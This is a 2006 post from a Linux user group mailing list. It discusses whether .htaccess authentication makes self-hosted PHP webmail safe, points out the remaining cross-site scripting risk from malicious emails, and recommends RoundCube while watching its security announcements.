[Gllug] recommendations for webmail software?

[Russell Howe]

On Thu, Mar 23, 2006 at 11:28:17AM +0000, Minty wrote:
> On 3/23/06, Richard Cohen <vmlinuz at gmail.com> wrote:
> > Yes, so in theory, I'd be happy running a PHP webmail I'd written
> > myself, or one written by someone I actually know and trust to run
> > public-facing code on my machine.
> 
> If you put the php app behind an .htaccess Auth setup, such that they
> would need to login via that before they ever got anywhere near any
> PHP, would that mitigate the security risk enough?
> 
> Might involve logging in twice tho, unless the app in question was
> already setup to integrate with that kind of auth method.

It would mitigate against some attacks, and we use this kind of setup at
work, together with mod_proxy, to isolate an IIS server from random IIS
exploits.

What it won't protect you from (and this is very relevant to a webmail
system) is cross site scripting attacks, where improper parsing of an
email could lead to a malicious email containing embedded
HTML/javascript/etc being executed/(mis-)parsed by the user's browser.

Admittedly, this is a problem common to all webapps, and it requires
quite a rigorous work ethic when programming to avoid creating loopholes
(it's one of those nasties where the bug might be there, but is hardly
noticeable in normal use).

You could take the view that no webmail application is likely to be
secure, and just go for full on eye candy:

http://www.roundcube.net/

(monitoring the security list for the application so that when there is
a hole found, you can go patch)

-- 
Russell Howe       | Why be just another cog in the machine,
rhowe at siksai.co.uk | when you can be the spanner in the works?
-- 
Gllug mailing list  -  Gllug at gllug.org.uk
http://lists.gllug.org.uk/mailman/listinfo/gllug